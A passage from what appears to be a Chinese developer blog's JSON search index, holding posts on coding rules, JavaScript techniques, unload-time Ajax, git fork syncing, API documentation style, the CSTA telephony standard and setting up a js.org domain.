当人们停止学习时,他们开始退化。\n","permalink":"https://wdd.js.org/posts/2018/02/few-simple-rules-for-good-coding-my-15-years-experience/","summary":"原文地址:https://hackernoon.com/few-simple-rules-for-good-coding-my-15-years-experience-96cb29d4acd9#.ddzpjb80c\n嗨,我的工作作为一个程序员超过15年,并使用许多不同的语言,范例,框架和其他狗屎。我想和大家分享我写好代码的规则。\n1. 优化VS可读性 去他妈的优化 始终编​​写易于阅读且对开发人员可理解的代码。因为在硬可读代码上花费的时间和资源将远远高于从优化中获得的。 如果你需要进行优化,那么使它像DI的独立模块,具有100%的测试覆盖率,并且不会被触及至少一年。\n2. 架构第一 我看到很多人说“我们需要快速做事,我们没有时间做架构”。其中约99%的人因为这样的想法而遇到了大问题。 编写代码而不考虑其架构是没有用的,就像没有实现它们的计划一样,梦想你的愿望。 在编写代码的第一行之前,你应该明白它将要做什么,它将如何使用,模块,服务如何相互工作,它将有什么结构,如何进行测试和调试,以及如何更新。\n3. 测试覆盖率 测试是好事,但他们并不总是负担得起,对项目有意义。\n当你需要测试:\n当你编写模块时,微服务将不会被触及至少一个月。 当你编写开源代码。 当你编写涉及金融渠道的核心代码或代码。 当您有代码更新的同时更新测试的资源。 当你不需要测试时:\n当你是一个创业。 当你有小团队和代码更改是快速。 当你编写的脚本,可以简单地通过他们的输出手动测试。 记住,带有严格测试的代码可能比没有测试的代码更有害。\n4. 保持简单,极度简单 不要编写复杂的代码。更多更简单,那么更少的错误它可能有和更少的时间来调试它们。代码应该做的只是它需要没有非常多的抽象和其他OOP shit(尤其是涉及java开发人员)+ 20%的东西可能需要在将来以简单的方式更新它。\n5. 注释 出现注释说明你的代码不够好。好的代码应该是可以理解的,没有一行注释。但是如何为新开发人员节省时间? - 编写简单的内联文档描述什么和如何方法工作。这将节省很多时间来理解,甚至更多 - 它将给人们更多的机会来提出更好的实施这种方法。并且它将是全球代码文档的良好开端。\n6. 硬耦合VS较小耦合 始终尝试使用微服务架构。单片软件可以比微服务软件运行得更快,但只能在一个服务器的上下文中运行。 微服务使您可以不仅在许多服务器上,而且有时甚至在一台机器上(我的意思是过程分发)高效地分发您的软件。\n7. 代码审查 代码审查可以是好的,也以是坏的。 您可以组织代码审查,只有当您有开发人员了解95%的代码,谁可以监控所有更新,而不浪费很多时间。在其他情况下,这将是只是耗时,每个人都会讨厌这个。\n在这部分有很多问题,所以更深入地描述这一点。\n许多人认为代码审查是一个很好的方式教新手,或者工作在不同部分的代码的队友。但是代码审查的主要目标是保持代码质量,而不是教学。让我们想象你的团队制作代码用于控制核反应堆或太空火箭发动机的冷却系统。你在非常硬的逻辑中犯了巨大的错误,然后你给这个代码审查新的家伙。你怎么认为会发生意外的风险? - 我的练习率超过70%。\n良好的团队是每个人都有自己的角色,负责确切的工作。如果有人想要理解另一段代码,那么他去一个负责任去问他。你不可能知道一切,更好的优秀的理解小块代码而不是理解所有。\n8. 重构没啥用 在我的职业生涯中,我听到很多次“不要担心,我们以后会重构它”。在未来,这会导致大的技术债务或从头开始删除所有的代码和写作。\n所以,不要得到一个债务,除非你有钱从头开发你的软件几次。\n9. 当你累了或在一个坏的心情不要写代码。 当开发人员厌倦时,他们正在制造2到5倍或者更多的bug。所以工作更多是非常糟糕的做法。这就是为什么越来越多的国家思考6小时工作日,其中一些已经有了。精神工作不同于使用你的二头肌。\n10. 不要一次写全部 - 使开发迭代 在编写代码分析和预测之前,您的客户/客户真正需要什么,然后选择您可以在短期内以高质量开发的MVF(最有价值的功能)。使用这样的迭代来部署质量更新,而不是腰部时间和资源对不合理的愿望和牺牲与质量。\n11. 自动化VS手动 自动化是长期的100%成功。所以如果你有资源自动化的东西,现在应该做。你可能认为“只需要5分钟,为什么我应该自动化?但让我计算这个。例如,它是5个开发人员的日常任务。 5分钟* 5天* 21天* 12个月= 6 300分钟= 105小时= 13.","title":"【译】13简单的优秀编码规则(从我15年的经验)"},{"content":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中一COM对象形式实现的任何函数,isFunction都返回false,因为他们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1. 惰性载入函数 假设有一个方法X,在A类浏览器里叫A,在b类浏览器里叫B,有些浏览器并没有这个方法,你想实现一个跨浏览器的方法。\n惰性载入函数的思想是:在函数内部改变函数自身的执行逻辑\nfunction X(){ if(A){ return new A(); } else{ if(B){ return new B(); } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } } 换一种写法\nfunction X(){ if(A){ X = function(){ return new A(); }; } else{ if(B){ X = function(){ return new B(); }; } else{ throw new Error(\u0026#39;no A or B\u0026#39;); } } return new X(); } 2. 防篡改对象 2.1. 不可扩展对象 Object.preventExtensions // 下面代码在谷歌浏览器中执行 \u0026gt; var person = {name: \u0026#39;wdd\u0026#39;}; undefined \u0026gt; Object.preventExtensions(person); Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; person.age = 10 10 \u0026gt; person Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; Object.isExtensible(person) false 2.2. 密封对象Object.seal 密封对象不可扩展,并且不能删除对象的属性或者方法。但是属性值可以修改。\n\u0026gt; var one = {name: \u0026#39;hihi\u0026#39;} undefined \u0026gt; Object.seal(one) Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; one.age = 12 12 \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; delete one.name false \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} 2.3. 冻结对象 Object.freeze 最严格的防篡改就是冻结对象。对象不可扩展,而且密封,不能修改。只能访问。\n3. 高级定时器 3.1. 函数节流 函数节流的思想是:某些代码不可以没有间断的连续重复执行\nvar processor = { timeoutId: null, // 实际进行处理的方法 performProcessing: function(){ ... }, // 初始化调用方法 process: function(){ clearTimeout(this.timeoutId); var that = this; this.timeoutId = setTimeout(function(){ that.performProcessing(); }, 100); } } // 尝试开始执行 processor.process(); 3.2. 中央定时器 页面如果有十个区域要动态显示当前时间,一般来说,可以用10个定时来实现。其实一个中央定时器就可以搞定。\n中央定时器动画 demo地址:http://wangduanduan.coding.me/my-all-demos/ninja/center-time-control.html\nvar timers = { timerId: 0, timers: [], add: function(fn){ this.timers.push(fn); }, start: function(){ if(this.timerId){ return; } (function runNext(){ if(timers.timers.length \u0026gt; 0){ for(var i=0; i \u0026lt; timers.timers.length ; i++){ if(timers.timers[i]() === false){ timers.timers.splice(i, 1); i--; } } timers.timerId = setTimeout(runNext, 16); } })(); }, stop: function(){ clearTimeout(timers.timerId); this.timerId = 0; } }; 参考书籍: 《javascript高级程序设计》 《javascript忍者秘籍》\n","permalink":"https://wdd.js.org/posts/2018/02/js-high-skills/","summary":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中一COM对象形式实现的任何函数,isFunction都返回false,因为他们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1.","title":"JavaScript 高级技巧"},{"content":"0.1. 先看题:mean的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.length; console.log(mean); 这样写有几个好处。\n循环的终止条件简单且明确 即使在循环体内修改了数组,也能有效的终止循环。否则就可能变成死循环。 编译器很难保证重启计算scores.length是安全的。 提前确定了循环终止条件,避免多次计算数组长度。这个可能会被一些浏览器优化。 ","permalink":"https://wdd.js.org/posts/2018/02/i-realy-dont-know-js/","summary":"0.1. 先看题:mean的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.","title":"突然觉得自己好像没学过JS"},{"content":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon\n","permalink":"https://wdd.js.org/posts/2018/02/send-ajax-when-page-unload/","summary":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon","title":"发起Ajax请求当页面onunload"},{"content":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库Bfork自仓库A, 仓库A的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉去上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. remote: Compressing objects: 100% (4/4), done. remote: Total 4 (delta 2), reused 0 (delta 0) Unpacking objects: 100% (4/4), done. From http://gitlab.tt.cc:30000/fe/omp * [new branch] master -\u0026gt; upstream/master // 4 将upstream/master分支合并到master分支,由于我已经在master分支,此处就不在切换到master分支 ➜ omp git:(master) git merge upstream/master Updating 29c098c..6413803 Fast-forward README.md | 1 + 1 file changed, 1 insertion(+) // 5 查看一下,此次合并,本地有哪些更新 ➜ omp git:(master) git log -p // 6 然后将更新推送到仓库B ➜ omp git:(master) git push 3. 总结 通过上述操作,仓库B就同步了仓库A的代码。整体的逻辑就是将上游分支拉去到本地,然后合并到本地分支上。就这么简单。\n","permalink":"https://wdd.js.org/posts/2018/01/fork-sync-learn/","summary":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库Bfork自仓库A, 仓库A的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉去上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. remote: Compressing objects: 100% (4/4), done.","title":"git合并上游仓库即同步fork后的仓库"},{"content":" 个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国\n","permalink":"https://wdd.js.org/about/","summary":"个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国","title":"关于我"},{"content":" 1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 异常处理 异常处理最小数据集\n状态码 说明 解决方案 举个栗子🌰:\n状态码 说明 解决方案 401 用户名密码错误 检查用户名密码是否正确 424 超过最大在线数量 请在控制台修改最大在线数量 之前我一直不想把解决方案加入异常处理的最小数据集,但是对于很多开发者来说,即使它知道424代表超过最大在线数量。如果你不告诉如果解决这个问题,那么他们可能就会直接来问你。所以最好能够一步到位,直接告诉他应该如何解决,这样省时省力。\n7. 如何组织? 7.1. 一个创建用户的例子:创建用户 1 请求示例\n// general POST http://www.testapi.com/api/user/vip/?token=abcdefg // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;] } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 2 路径与查询字符串参数模型\nPOST http://www.testapi.com/api/user/{userType}/?token={token}\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 token 是 认证令牌 3 请求体参数模型\n名称 是否必须 说明 name 是 用户名。4-50个字符 age 否 年龄 like 否 爱好。最多20个 4 响应体参数模型\n名称 说明 id 用户id 5 异常处理\n状态码 说明 解决方案 401 token过期 请重新申请token 424 超过最大在创建人数 请在控制台修改最大创建人数 7.2. 这样组织的原因 请求示例: 请求示例放在第一位的原因是,要用最快的方式告诉开发者,这个接口应该如何请求 路径与查询字符串参数模型: 使用mustache包裹参数 请求体参数模型:如果没有请求体,可以不写 响应体参数模型: 异常处理 8. 文档提供的形式 文档建议由一下两种形式,在线文档,pdf文档。\n在线文档 更新方便 易于随时阅读 易于查找 pdf文档 内容表现始终如一,不依赖文档阅读器 文档只读,不会被轻易修改 其中由于是面对第三方开发者,公开的在线文档必须提供;由于某些特殊的原因,可能需要提供文件形式的文档,建议提供pdf文档。当然,以下的文档形式是非常不建议提供的:\nword文档 markdown文档 word文档和markdown文档有以下缺点:\n文档的表现形式非常依赖文档查看器:各个版本的word文档对word的表现形式差异很大,可能在你的电脑上内容表现很好的文档,到别人的电脑上就会一团乱麻;另外markdown文件也是如此。而且markdown中引入文件只能依靠图片链接,如果文档中含有图片,很可能会出现图片丢失的情况。 文档无法只读:文档无法只读,就有可能会被第三方开发者在不经意间修改,那么文档就无法保证其准确性了。 总结一下,文档形式的要点:\n只读性:保证文档不会被开发者轻易修改 一致性:保证文档在不同设备,不同文档查看器上内容表现始终如一 易于版本管理:文档即软件(DAAS: Document as a Software),一般意义上说软件 = 数据 + 算法, 但是我认为文档也是一种组成软件的重要形式。既然软件需要版本管理,文档的版本管理也是比不可少的。 ","permalink":"https://wdd.js.org/posts/2018/01/how-to-write-better-api-docs/","summary":"1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 异常处理 异常处理最小数据集","title":"如何写好接口文档?"},{"content":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)\n","permalink":"https://wdd.js.org/posts/2018/01/ie11-without-devtool/","summary":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)","title":"win7 ie11 开发者工具打开后一片空白"},{"content":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88\nJune 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87\nJune 2004: 发布 “Application Session Services” (ECMA-354)\nJune 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366)\nDecember 2005 : 发布 “Management Notification and Computing Function Services”\nDecember 2005 : Session Management, Event Notification, Amendements for ECMA- 348” (TR/90)\nDecember 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348\n4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过CSTA自带的扩展机制(e.g. ONS – One Number Service) 6. CSTA 操作模型 CSTA操作模型由计算域和转换域组成,是CSTA定义在两个域之间的接口 CSTA标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是CSTA程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如CSTA呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/posts/2018/01/csta-call-model-overview/","summary":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec.","title":"CSTA 呼叫模型简介"},{"content":" 之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull 